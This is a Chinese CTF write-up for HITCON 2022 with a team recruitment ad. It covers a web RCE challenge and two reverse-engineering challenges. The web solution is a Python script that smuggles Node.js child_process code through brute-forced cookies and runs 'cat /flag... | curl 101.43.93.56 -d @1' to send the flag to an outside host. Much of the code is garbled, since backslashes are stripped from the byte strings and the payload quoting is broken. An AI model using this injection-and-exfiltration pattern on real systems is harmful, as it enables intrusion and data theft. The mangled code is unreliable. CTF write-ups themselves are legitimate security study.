2022HITCON WriteUp by Mini-Venom(招新)

admin 2022年11月29日16:22:57评论58 views字数 17362阅读57分52秒阅读模式

2022HITCON WriteUp by Mini-Venom(招新)

招新小广告CTF组诚招re、crypto、pwn、misc、合约方向的师傅,长期招新IOT+Car+工控+样本分析多个组招人有意向的师傅请联系邮箱[email protected](带上简历和想加入的小组)

Web

RCE

解题思路

import requests
import urllib.parse
import re
from multiprocessing.pool import ThreadPool
import binascii

target_url = 'http://24fhhiuetp.rce.chal.hitconctf.com'
REGEX = '(?<=s:).*?(?=.)'
s = requests.session()
original_payloads = ['global.a1  = 'child'',
                    'a1 = a1 + '_process'',
                    'global.b=require(a1)',
                    'global.c1 =       ''' ,
                    'c1=c1+'cat /flag-1e'',
                    'c1=c1+'5657085ea974'',
                    'c1=c1+'db77cdef03cc'',
                    'c1=c1+'5753833fea16'',
                    'c1=c1+          '68'',
                    'c1=c1+'>1&curl 101.'',
                    'c1=c1+'43.93.56    '',
                    'c1=      c1+' -d @1'',
                    '          b.exec(c1)']


hex_payloads = [i.encode("utf-8").hex() for i in original_payloads]
exploit_payloads = []

def init_attack():
    s.get(target_url)
   #  print(s.cookies.get("code"))
def brute_force(payload):
    count = 1
    tmp_cookie = s.cookies.get("code")
    while True:
        res = requests.get(target_url+'/random',cookies={'code':tmp_cookie}, proxies={'http':'127.0.0.1:8080'})
        cookies = urllib.parse.unquote(res.cookies.get("code"))
        cookies = ''.join(re.findall(REGEX, cookies))
        tmp = payload[:count]
        if(tmp==cookies):
            tmp_cookie = res.cookies.get("code")
            count += 1
            print(cookies)
        elif (count==len(payload)+1):
            break
        else:
            continue
    exploit_payloads.append( str(binascii.unhexlify(payload)) + " : " + tmp_cookie)
    print(payload + " : " + tmp_cookie)



if __name__ == '__main__':
    init_attack()
    pool = ThreadPool(10) 
    pool.map(brute_force, hex_payloads)  
    pool.close()  
    pool.join()  
    print(exploit_payloads)

Reverse

checker

解题思路
检查部分

switch ( CurrentIrpStackLocation->Parameters.Read.ByteOffset.LowPart )
      {
        case 0x222000u:
          sub_1400014D0(0);
          byte_140013190[0] = 1;
          break;
        case 0x222010u:
          sub_1400014D0(32u);
          byte_140013191 = 1;
          break;
        case 0x222020u:
          sub_1400014D0(64u);
          byte_140013192 = 1;
          break;
        case 0x222030u:
          sub_1400014D0(96u);
          byte_140013193 = 1;
          break;
        case 0x222040u:
          sub_1400014D0(128u);
          byte_140013194 = 1;
          break;
        case 0x222050u:
          sub_1400014D0(160u);
          byte_140013195 = 1;
          break;
        case 0x222060u:
          sub_1400014D0(192u);
          byte_140013196 = 1;
          break;
        case 0x222070u:
          sub_1400014D0(224u);
          byte_140013197 = 1;
          break;
        case 0x222080u:
          if ( !Length )
            goto LABEL_15;
          v7 = 1;
          v8 = 0i64;
          while ( byte_140013190[v8] )
          {
            if ( ++v8 >= 8 )
              goto LABEL_21;
          }
          v7 = 0;
LABEL_21:
          if ( v7 )
          {
            v9 = dword_140003000 - 0x63746968;
            if ( dword_140003000 == 0x63746968 )
              v9 = (unsigned __int16)word_140003004 - 0x6E6F;
            **(_BYTE **)(a2 + 24) = v9 == 0;
          }
          else
          {
LABEL_15:
            **(_BYTE **)(a2 + 24) = 0;
          }
          break;

大概就是这些值都要过一遍,并且最后要和两个值相等(hitcon) 上面有个函数sub_1400014D0(0),里面进行了一些xor变换 然后看驱动入口,除了注册上面的major function外,还有如下

PhysicalAddress = MmGetPhysicalAddress((char *)sub_140001490 + 0x1B70);// 0x140003000
  qword_140013170 = (char *)MmMapIoSpace(PhysicalAddress, 0x1000ui64, MmNonCached);
  qword_140013178 = (__int64)(qword_140013170 + 0x30);// 0x140003030
  v5 = MmGetPhysicalAddress((char *)sub_140001490 - 96);// 140001430
  qword_140013188 = (char *)MmMapIoSpace(v5, 0x1000ui64, MmNonCached);
  qword_140013180 = qword_140013188 + 0x700;    // 0x140001b30

可以发现,这里地址其中之一就是某个操作函数的地址,实际上就是自修改代码,必须输入正确的序列才能得到正确的代码

d_0x140001b30=b'x80xe9"x80xf1xadx0fxb6xc1kxc8x11xb8x9ex00x00x00*xc1xc3' # xor_sub
d_0x140001430=b'@SHx83xec Hx8bx05;x0cx00x00Hx8bxdaHx8bJx10H9x08u7Hx8bJx08xffx15x1d'
xor_d=b"x19xbcx8fx82xd0,a4xc0x9fxf6Pxd5xfbx0cnxd0xebxe5xe3xcexb5LxcaExaax11xb2>bo}xd0xebxa9xe3xb2/x06G|(xc5xdexdex1aNxd6xd8-x93Ox82edxfdx08bKx87~RG0xb7xbaxd09hSPxab xd5xcax84&qox91x1b6Fx11xa5xf1NXltxd4x9cx15xe2(xd5xd9x0f=x83xf3xfcxd1x13x1abx12@xaaxeaxcdxcbxe1xc6x08x81x98xf6hx88xbe#xb5x9eUxb9xe2}Zxda9x07xf0.2 YVLxb4x8f>x07axd9x0f-axf1x913x14xcbIhxfex1fxd4x8axfexe1xc6x18cx9ax9bx8ax8ax7fx08xc3xe8xe1xecx0bx8f;x00x94xa5x11xe7Gfxc4x9fx98x18pxf00xf6x94qxb1x95xd1xf0oxb7xd9=x05x9exc1S3vx9bKixcaxdexfd}gxb8)+xc7xc5x84,xd1x87x87xf1x98x97txadK2xf0JQrxeatxf78xfd'xbdx1cRqCx95x9cx1ax86xf2xc0xf9xf8"
c=b'c`xa5xb9xffxfc0nHxbbxfexfe2,nxd6xe6xfexfe2,nxd6xbbJJ2,xfcxffnxfdxbbxfe,xb9cxd6xb9bxd6nO'
from unicorn import *
import unicorn.x86_const as uc
import itertools as it
import capstone as cp
def xor_sub(a1):
    return (-98 - 17 * ((a1 - 34) ^ 0xAD)+0x100000000)&0xff
def disasm(code):
    cs=cp.Cs(cp.CS_ARCH_X86,cp.CS_MODE_32)
    for i in cs.disasm(code,0):
        print(i)
def exe(code,data,end=0x13):
    # disasm(code)
    mu=Uc(UC_ARCH_X86,UC_MODE_64)
    base=0
    stack_addr=0X100000
    size=1024*1024
    mu.mem_map(base,size)
    mu.mem_map(stack_addr,size)
    mu.mem_write(base,code)
    mu.reg_write(uc.UC_X86_REG_RSP,stack_addr+size-1)
    mu.reg_write(uc.UC_X86_REG_RCX,data)
    mu.emu_start(base,base+end)
    r=mu.reg_read(uc.UC_X86_REG_RAX)
    return r
def check(seq):
    f=[i for i in c]
    code=[i for i in d_0x140001b30]
    for i in range(32):
        code[i%16]^=d_0x140001430[i]
    for j,e in seq:
        x=xor_d[j*32:j*32+32]
        for i in range(16):
            code[i]^=x[i]
        for i in range(len(f)):
            f[i]=exe(bytes(code),f[i],e)
        for i in range(16):
            code[i]^=x[i+16]
    print(bytes(f))
seq=[(7,0xd),(2,6),(6,0xd),(0,0x3),(1,0x3),(4,0xc),(3,0x9),(5,0xd)] # 通过disasm不断尝试找到合法的指令和结束位置
check(seq)

Meow

解题思路
一眼天堂之门
dump出code后保存成单个二进制文件,使用IDA单独分析特征。一般这么多函数的肯定有公共特征

c=b"x96Pxcf,xebx9bxaaxfbSxabsxddlx9exdbxbcxeexab#xd6x16xfdxf1xf0xb9uxc3(xa2t}xe3'xd5x95\xf5vuxc9x8cxfbBx0exbdQxa2x98"
codes=b'j3xe8x00x00x00x00x83x04$x05xcbH1xc0eHx8b@`Hx0fxb6@x02gx8bL$x1cgx89x01x85xc0ux18gx8b|$x04gx8bt$x0cgx8bL$x14gx02x0ex80xf1xbagx88x0fxe8x00x00x00x00xc7D$x04#x00x00x00x83x04$rxcbxc3x00x00x00x00x00x00x00x00j3xe8x00x00x00x00x83x04$x05xcbH1xc0eHx8b@`Hx0fxb6@x02gx8bL$x1cgx89x01x85xc0ux18gx8b|$x04gx8bt$x0cgx8bL$x14gx02x0ex80xf1/gx88x0fxe8x00x00x00x00xc7D$x04#x00x00x00x83x04$rxcbxc3x00x00x00x00Usage: %s <flag>nx00x00x00j3xe8x00x00x00x00x83x04$x05xcbH1xc0eHx8b@`Hx0fxb6@x02gx8bL$x1cgx89x01x85xc0ux18gx8b|$x04gx8bt$x0cgx8bL$x14gx02x0ex80xf1xcdgx88x0fxe8x00x00x00x00xc7D$x04#x00x00x00x83x04$rxcbxc3x00x00x00x00Wrong lengthnx00x00x00x00x00x00x00j3xe8x00x00x00x00x83x04$x05xcbH1xc0eHx8b@`Hx0fxb6x80xbcx00x00x00gx8bL$x1cx83xe0pgx89x01x85xc0ux18gx8b|$x04gx8bt$x0cgx8bL$x14gx02x0ex80xf1xf6gx88x0fxe8x00x00x00x00xc7D$x04#x00x00x00x83x04$rxcbxc3x00x00j3xe8x00x00x00x00x83x04$x05xcbH1xc0eHx8b@`Hx0fxb6@x02gx8bL$x1cgx89x01x85xc0ux18gx8b|$x04gx8bt$x0cgx8bL$x14gx02x0ex80xf1x9fgx88x0fxe8x00x00x00x00xc7D$x04#x00x00x00x83x04$rxcbxc3x00x00x00x00Wrongnx00x00x00x00x00x00j3xe8x00x00x00x00x83x04$x05xcbH1xc0eHx8b@`Hx0fxb6@x02gx8bL$x1cgx89x01x85xc0ux18gx8b|$x04gx8bt$x0cgx8bL$x14g*x0ex80xf1xd0gx88x0fxe8x00x00x00x00xc7D$x04#x00x00x00x83x04$rxcbxc3x00x00x00x00I know you know the flag!nx00x00j3xe8x00x00x00x00x83x04$x05xcbH1xc0eHx8b@`Hx0fxb6x80xbcx00x00x00gx8bL$x1cx83xe0pgx89x01x85xc0ux18gx8b|$x04gx8bt$x0cgx8bL$x14gx02x0ex80xf1"gx88x0fxe8x00x00x00x00xc7D$x04#x00x00x00x83x04$rxcbxc3x00x00j3xe8x00x00x00x00x83x04$x05xcbH1xc0eHx8b@`Hx0fxb6x80xbcx00x00x00gx8bL$x1cx83xe0pgx89x01x85xc0ux18gx8b|$x04gx8bt$x0cgx8bL$x14g*x0ex80xf1xf7gx88x0fxe8x00x00x00x00xc7D$x04#x00x00x00x83x04$rxcbxc3x00x00j3xe8x00x00x00x00x83x04$x05xcbH1xc0eHx8b@`Hx0fxb6@x02gx8bL$x1cgx89x01x85xc0ux18gx8b|$x04gx8bt$x0cgx8bL$x14gx02x0ex80xf1xd0gx88x0fxe8x00x00x00x00xc7D$x04#x00x00x00x83x04$rxcbxc3x00x00x00x00x00x00x00x00j3xe8x00x00x00x00x83x04$x05xcbH1xc0eHx8b@`Hx0fxb6@x02gx8bL$x1cgx89x01x85xc0ux18gx8b|$x04gx8bt$x0cgx8bL$x14gx02x0ex80xf1x1fgx88x0fxe8x00x00x00x00xc7D$x04#x00x00x00x83x04$rxcbxc3x00x00x00x00x00x00x00x00j3xe8x00x00x00x00x83x04$x05xcbH1xc0eHx8b@`Hx0fxb6x80xbcx00x00x00gx8bL$x1cx83xe0pgx89x01x85xc0ux18gx8b|$x04gx8bt$x0cgx8bL$x14g*x0ex80xf1xa8gx88x0fxe8x00x00x00x00xc7D$x04#x00x00x00x83x04$rxcbxc3x00x00j3xe8x00x00x00x00x83x04$x05xcbH1xc0eHx8b@`Hx0fxb6@x02gx8bL$x1cgx89x01x85xc0ux18gx8b|$x04gx8bt$x0cgx8bL$x14g*x0ex80xf1=gx88x0fxe8x00x00x00x00xc7D$x04#x00x00x00x83x04$rxcbxc3x00x00x00x00x00x00x00x00j3xe8x00x00x00x00x83x04$x05xcbH1xc0eHx8b@`Hx0fxb6x80xbcx00x00x00gx8bL$x1cx83xe0pgx89x01x85xc0ux18gx8b|$x04gx8bt$x0cgx8bL$x14gx02x0ex80xf1xc7gx88x0fxe8x00x00x00x00xc7D$x04#x00x00x00x83x04$rxcbxc3x00x00j3xe8x00x00x00x00x83x04$x05xcbH1xc0eHx8b@`Hx0fxb6@x02gx8bL$x1cgx89x01x85xc0ux18gx8b|$x04gx8bt$x0cgx8bL$x14gx02x0ex80xf1xa5gx88x0fxe8x00x00x00x00xc7D$x04#x00x00x00x83x04$rxcbxc3x00x00x00x00x00x00x00x00j3xe8x00x00x00x00x83x04$x05xcbH1xc0eHx8b@`Hx0fxb6@x02gx8bL$x1cgx89x01x85xc0ux18gx8b|$x04gx8bt$x0cgx8bL$x14g*x0ex80xf1Ggx88x0fxe8x00x00x00x00xc7D$x04#x00x00x00x83x04$rxcbxc3x00x00x00x00x00x00x00x00j3xe8x00x00x00x00x83x04$x05xcbH1xc0eHx8b@`Hx0fxb6@x02gx8bL$x1cgx89x01x85xc0ux18gx8b|$x04gx8bt$x0cgx8bL$x14gx02x0ex80xf1hgx88x0fxe8x00x00x00x00xc7D$x04#x00x00x00x83x04$rxcbxc3x00x00x00x00x00x00x00x00j3xe8x00x00x00x00x83x04$x05xcbH1xc0eHx8b@`Hx0fxb6@x02gx8bL$x1cgx89x01x85xc0ux18gx8b|$x04gx8bt$x0cgx8bL$x14gx02x0ex80xf1xd7gx88x0fxe8x00x00x00x00xc7D$x04#x00x00x00x83x04$rxcbxc3x00x00x00x00x00x00x00x00j3xe8x00x00x00x00x83x04$x05xcbH1xc0eHx8b@`Hx0fxb6@x02gx8bL$x1cgx89x01x85xc0ux18gx8b|$x04gx8bt$x0cgx8bL$x14g*x0ex80xf1Jgx88x0fxe8x00x00x00x00xc7D$x04#x00x00x00x83x04$rxcbxc3x00x00x00x00x00x00x00x00j3xe8x00x00x00x00x83x04$x05xcbH1xc0eHx8b@`Hx0fxb6x80xbcx00x00x00gx8bL$x1cx83xe0pgx89x01x85xc0ux18gx8b|$x04gx8bt$x0cgx8bL$x14gx02x0ex80xf1x96gx88x0fxe8x00x00x00x00xc7D$x04#x00x00x00x83x04$rxcbxc3x00x00j3xe8x00x00x00x00x83x04$x05xcbH1xc0eHx8b@`Hx0fxb6x80xbcx00x00x00gx8bL$x1cx83xe0pgx89x01x85xc0ux18gx8b|$x04gx8bt$x0cgx8bL$x14g*x0ex80xf1x91gx88x0fxe8x00x00x00x00xc7D$x04#x00x00x00x83x04$rxcbxc3x00x00j3xe8x00x00x00x00x83x04$x05xcbH1xc0eHx8b@`Hx0fxb6x80xbcx00x00x00gx8bL$x1cx83xe0pgx89x01x85xc0ux18gx8b|$x04gx8bt$x0cgx8bL$x14gx02x0ex80xf1.gx88x0fxe8x00x00x00x00xc7D$x04#x00x00x00x83x04$rxcbxc3x00x00j3xe8x00x00x00x00x83x04$x05xcbH1xc0eHx8b@`Hx0fxb6x80xbcx00x00x00gx8bL$x1cx83xe0pgx89x01x85xc0ux18gx8b|$x04gx8bt$x0cgx8bL$x14gx02x0ex80xf1x19gx88x0fxe8x00x00x00x00xc7D$x04#x00x00x00x83x04$rxcbxc3x00x00j3xe8x00x00x00x00x83x04$x05xcbH1xc0eHx8b@`Hx0fxb6x80xbcx00x00x00gx8bL$x1cx83xe0pgx89x01x85xc0ux18gx8b|$x04gx8bt$x0cgx8bL$x14gx02x0ex80xf1xc5gx88x0fxe8x00x00x00x00xc7D$x04#x00x00x00x83x04$rxcbxc3x00x00j3xe8x00x00x00x00x83x04$x05xcbH1xc0eHx8b@`Hx0fxb6x80xbcx00x00x00gx8bL$x1cx83xe0pgx89x01x85xc0ux18gx8b|$x04gx8bt$x0cgx8bL$x14gx02x0ex80xf1xe3gx88x0fxe8x00x00x00x00xc7D$x04#x00x00x00x83x04$rxcbxc3x00x00j3xe8x00x00x00x00x83x04$x05xcbH1xc0eHx8b@`Hx0fxb6x80xbcx00x00x00gx8bL$x1cx83xe0pgx89x01x85xc0ux18gx8b|$x04gx8bt$x0cgx8bL$x14gx02x0ex80xf1x88gx88x0fxe8x00x00x00x00xc7D$x04#x00x00x00x83x04$rxcbxc3x00x00j3xe8x00x00x00x00x83x04$x05xcbH1xc0eHx8b@`Hx0fxb6@x02gx8bL$x1cgx89x01x85xc0ux18gx8b|$x04gx8bt$x0cgx8bL$x14g*x0ex80xf1xbdgx88x0fxe8x00x00x00x00xc7D$x04#x00x00x00x83x04$rxcbxc3x00x00x00x00x00x00x00x00j3xe8x00x00x00x00x83x04$x05xcbH1xc0eHx8b@`Hx0fxb6@x02gx8bL$x1cgx89x01x85xc0ux18gx8b|$x04gx8bt$x0cgx8bL$x14gx02x0ex80xf1Ngx88x0fxe8x00x00x00x00xc7D$x04#x00x00x00x83x04$rxcbxc3x00x00x00x00x00x00x00x00j3xe8x00x00x00x00x83x04$x05xcbH1xc0eHx8b@`Hx0fxb6@x02gx8bL$x1cgx89x01x85xc0ux18gx8b|$x04gx8bt$x0cgx8bL$x14gx02x0ex80xf1x93gx88x0fxe8x00x00x00x00xc7D$x04#x00x00x00x83x04$rxcbxc3x00x00x00x00x00x00x00x00j3xe8x00x00x00x00x83x04$x05xcbH1xc0eHx8b@`Hx0fxb6@x02gx8bL$x1cgx89x01x85xc0ux18gx8b|$x04gx8bt$x0cgx8bL$x14g*x0ex80xf1x13gx88x0fxe8x00x00x00x00xc7D$x04#x00x00x00x83x04$rxcbxc3x00x00x00x00x00x00x00x00j3xe8x00x00x00x00x83x04$x05xcbH1xc0eHx8b@`Hx0fxb6x80xbcx00x00x00gx8bL$x1cx83xe0pgx89x01x85xc0ux18gx8b|$x04gx8bt$x0cgx8bL$x14g*x0ex80xf1xf1gx88x0fxe8x00x00x00x00xc7D$x04#x00x00x00x83x04$rxcbxc3x00x00j3xe8x00x00x00x00x83x04$x05xcbH1xc0eHx8b@`Hx0fxb6x80xbcx00x00x00gx8bL$x1cx83xe0pgx89x01x85xc0ux18gx8b|$x04gx8bt$x0cgx8bL$x14gx02x0ex80xf1xccgx88x0fxe8x00x00x00x00xc7D$x04#x00x00x00x83x04$rxcbxc3x00x00j3xe8x00x00x00x00x83x04$x05xcbH1xc0eHx8b@`Hx0fxb6x80xbcx00x00x00gx8bL$x1cx83xe0pgx89x01x85xc0ux18gx8b|$x04gx8bt$x0cgx8bL$x14gx02x0ex80xf1Ggx88x0fxe8x00x00x00x00xc7D$x04#x00x00x00x83x04$rxcbxc3x00x00j3xe8x00x00x00x00x83x04$x05xcbH1xc0eHx8b@`Hx0fxb6x80xbcx00x00x00gx8bL$x1cx83xe0pgx89x01x85xc0ux18gx8b|$x04gx8bt$x0cgx8bL$x14gx02x0ex80xf1xabgx88x0fxe8x00x00x00x00xc7D$x04#x00x00x00x83x04$rxcbxc3x00x00j3xe8x00x00x00x00x83x04$x05xcbH1xc0eHx8b@`Hx0fxb6@x02gx8bL$x1cgx89x01x85xc0ux18gx8b|$x04gx8bt$x0cgx8bL$x14gx02x0ex80xf1xc9gx88x0fxe8x00x00x00x00xc7D$x04#x00x00x00x83x04$rxcbxc3x00x00x00x00x00x00x00x00j3xe8x00x00x00x00x83x04$x05xcbH1xc0eHx8b@`Hx0fxb6@x02gx8bL$x1cgx89x01x85xc0ux18gx8b|$x04gx8bt$x0cgx8bL$x14g*x0ex80xf1Hgx88x0fxe8x00x00x00x00xc7D$x04#x00x00x00x83x04$rxcbxc3x00x00x00x00x00x00x00x00j3xe8x00x00x00x00x83x04$x05xcbH1xc0eHx8b@`Hx0fxb6@x02gx8bL$x1cgx89x01x85xc0ux18gx8b|$x04gx8bt$x0cgx8bL$x14g*x0ex80xf1+gx88x0fxe8x00x00x00x00xc7D$x04#x00x00x00x83x04$rxcbxc3x00x00x00x00x00x00x00x00j3xe8x00x00x00x00x83x04$x05xcbH1xc0eHx8b@`Hx0fxb6x80xbcx00x00x00gx8bL$x1cx83xe0pgx89x01x85xc0ux18gx8b|$x04gx8bt$x0cgx8bL$x14gx02x0ex80xf1tgx88x0fxe8x00x00x00x00xc7D$x04#x00x00x00x83x04$rxcbxc3x00x00j3xe8x00x00x00x00x83x04$x05xcbH1xc0eHx8b@`Hx0fxb6@x02gx8bL$x1cgx89x01x85xc0ux18gx8b|$x04gx8bt$x0cgx8bL$x14g*x0ex80xf1Pgx88x0fxe8x00x00x00x00xc7D$x04#x00x00x00x83x04$rxcbxc3x00x00x00x00x00x00x00x00j3xe8x00x00x00x00x83x04$x05xcbH1xc0eHx8b@`Hx0fxb6x80xbcx00x00x00gx8bL$x1cx83xe0pgx89x01x85xc0ux18gx8b|$x04gx8bt$x0cgx8bL$x14gx02x0ex80xf1Ogx88x0fxe8x00x00x00x00xc7D$x04#x00x00x00x83x04$rxcbxc3x00x00j3xe8x00x00x00x00x83x04$x05xcbH1xc0eHx8b@`Hx0fxb6@x02gx8bL$x1cgx89x01x85xc0ux18gx8b|$x04gx8bt$x0cgx8bL$x14g*x0ex80xf1xe9gx88x0fxe8x00x00x00x00xc7D$x04#x00x00x00x83x04$rxcbxc3x00x00x00x00x00x00x00x00j3xe8x00x00x00x00x83x04$x05xcbH1xc0eHx8b@`Hx0fxb6x80xbcx00x00x00gx8bL$x1cx83xe0pgx89x01x85xc0ux18gx8b|$x04gx8bt$x0cgx8bL$x14g*x0ex80xf1xc0gx88x0fxe8x00x00x00x00xc7D$x04#x00x00x00x83x04$rxcbxc3x00x00j3xe8x00x00x00x00x83x04$x05xcbH1xc0eHx8b@`Hx0fxb6@x02gx8bL$x1cgx89x01x85xc0ux18gx8b|$x04gx8bt$x0cgx8bL$x14gx02x0ex80xf1^gx88x0fxe8x00x00x00x00xc7D$x04#x00x00x00x83x04$rxcbxc3x00x00x00x00x00x00x00x00j3xe8x00x00x00x00x83x04$x05xcbH1xc0eHx8b@`Hx0fxb6x80xbcx00x00x00gx8bL$x1cx83xe0pgx89x01x85xc0ux18gx8b|$x04gx8bt$x0cgx8bL$x14g*x0ex80xf1xefgx88x0fxe8x00x00x00x00xc7D$x04#x00x00x00x83x04$rxcbxc3x00x00j3xe8x00x00x00x00x83x04$x05xcbH1xc0eHx8b@`Hx0fxb6x80xbcx00x00x00gx8bL$x1cx83xe0pgx89x01x85xc0ux18gx8b|$x04gx8bt$x0cgx8bL$x14g*x0ex80xf1x8bgx88x0fxe8x00x00x00x00xc7D$x04#x00x00x00x83x04$rxcbxc3x00x00j3xe8x00x00x00x00x83x04$x05xcbH1xc0eHx8b@`Hx0fxb6@x02gx8bL$x1cgx89x01x85xc0ux18gx8b|$x04gx8bt$x0cgx8bL$x14g*x0ex80xf1x85gx88x0fxe8x00x00x00x00xc7D$x04#x00x00x00x83x04$rxcbxc3x00x00x00x00x00x00x00x00j3xe8x00x00x00x00x83x04$x05xcbH1xc0eHx8b@`Hx0fxb6x80xbcx00x00x00gx8bL$x1cx83xe0pgx89x01x85xc0ux18gx8b|$x04gx8bt$x0cgx8bL$x14g*x0ex80xf1xcbgx88x0fxe8x00x00x00x00xc7D$x04#x00x00x00x83x04$rxcbxc3x00x00j3xe8x00x00x00x00x83x04$x05xcbH1xc0eHx8b@`Hx0fxb6x80xbcx00x00x00gx8bL$x1cx83xe0pgx89x01x85xc0ux18gx8b|$x04gx8bt$x0cgx8bL$x14gx02x0ex80xf1Ugx88x0fxe8x00x00x00x00xc7D$x04#x00x00x00x83x04$rxcbxc3x00x00j3xe8x00x00x00x00x83x04$x05xcbH1xc0eHx8b@`Hx0fxb6@x02gx8bL$x1cgx89x01x85xc0ux18gx8b|$x04gx8bt$x0cgx8bL$x14g*x0ex80xf1pgx88x0fxe8x00x00x00x00xc7D$x04#x00x00x00x83x04$rxcbxc3x00x00x00x00'
base=0x4031c0
head=b'x6ax33xe8x00x00x00x00x83x04x24x05xcb'
tail=bytes.fromhex("e800000000c7442404230000008304240dcbc3")

import capstone as cp
def disasm(code,p=True):
    cs=cp.Cs(cp.CS_ARCH_X86,cp.CS_MODE_64)
    if p:
        for i in cs.disasm(code,0):
            print(i)
    return cs.disasm(code,0)

def find_addr(codes:bytes):
    addrs=[]
    start=0
    while start<len(codes):
        st=codes[start:].find(head)
        if st==-1:break
        start+=st
        end=codes[start:].find(tail)
        addrs.append((start,start+end))
        start=start+end+len(tail)
    return addrs
def get_xor_data(code):
    for i in disasm(code,p=False):
        if i.mnemonic=='xor':
            # print(i)
            if 'rax' not in i.op_str:
                # print(i.op_str)
                return int(i.op_str.split(',')[-1],base=16)
def get_op(code):
    dis=disasm(code,False)
    ops=[i.mnemonic for i in dis]
    # print(ops)
    if ops[-3]=='add':
        return 1
    elif ops[-3]=='sub':
        return 2
    else:
        print(ops)
        exit()
addrs=find_addr(codes)
add_data=[196,22,142,119,5,185,13,107,36,85,18,53,118,231,251,160,218,52,132,180,200,155,239,180,185,10,87,92,254,197,106,115,73,189,17,214,143,107,10,151,171,78,237,254,151,249,152,101]

xor_data=[get_xor_data(codes[st:en]) for st,en in addrs]
op=[get_op(codes[st:en]) for st,en in addrs]
# get_op(codes[addrs[0][0]:addrs[0][1]])
f=[0]*len(c)
for i in range(len(c)):
    if op[i]==1:
        f[i]=(c[i]^xor_data[i])-add_data[i]+0x100&0xff
    elif op[i]==2:
        f[i]=add_data[i]-(c[i]^xor_data[i])+0x100&0xff
    else:
        print(i,op[i])
        exit()
print(bytes(f))

原文始发于微信公众号(ChaMd5安全团队):2022HITCON WriteUp by Mini-Venom(招新)

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年11月29日16:22:57
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   2022HITCON WriteUp by Mini-Venom(招新)http://cn-sec.com/archives/1432218.html

发表评论

匿名网友 填写信息